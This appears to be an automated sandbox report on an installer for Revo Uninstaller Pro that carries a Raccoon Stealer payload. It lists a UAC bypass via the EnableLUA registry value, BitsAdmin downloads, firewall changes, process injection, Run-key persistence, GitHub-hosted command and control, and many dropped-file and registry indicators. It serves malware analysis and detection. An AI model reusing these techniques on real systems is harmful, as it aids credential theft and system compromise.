Analysis Overview
SHA256
2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799
Threat Level: Known bad
The file 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Raccoon Stealer V1 payload
UAC bypass
Raccoon
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Drops file in Drivers directory
Modifies Windows Firewall
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Loads dropped DLL
Checks computer location settings
Modifies system executable filetype association
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-02 14:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-02 14:53
Reported
2024-10-02 14:55
Platform
win10v2004-20240802-en
Max time kernel
147s
Max time network
148s
Command Line
Signatures
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\DRIVERS\SETC573.tmp | C:\Windows\system32\rundll32.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETC573.tmp | C:\Windows\system32\rundll32.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\revoflt.sys | C:\Windows\system32\rundll32.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| N/A | N/A | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| N/A | N/A | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | N/A |
| N/A | N/A | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | N/A |
| N/A | N/A | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| N/A | N/A | C:\Windows\system32\regsvr32.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\rundll32.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4612 set thread context of 2752 | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | C:\ProgramData\uzlyLtM20yixSdV\111.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQ2IF.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-2SAH8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M285L.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BH5TN.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-E8NN8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-98A4K.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-TMR6O.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PIF2G.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QTSI6.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T6OE0.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HESS8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CO13.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I4R82.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KF950.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1DEPE.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8EBPQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-B842V.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0CNGL.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DBS9F.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11D5K.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5EJO.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I0JB7.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MGU6R.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GUGQ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7IFIE.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-JLN3A.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7OTPS.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MRVBA.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-OOVS2.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-1OS3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5T18.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1AJUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-2BPEO.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PSTB9.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RJU1.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-DIHT4.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-NNFCT.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P30VC.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5SN49.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KSQCR.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5QS7.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8SAF9.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L3SUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-86AVN.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-LO1UR.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P9GR5.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files (x86)\is-H9BQU.tmp | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SHUNJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5H27N.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4JI7F.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CFCOM.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1ALQI.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BMARA.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PH91H.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7MFPL.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-00GEF.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mode.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
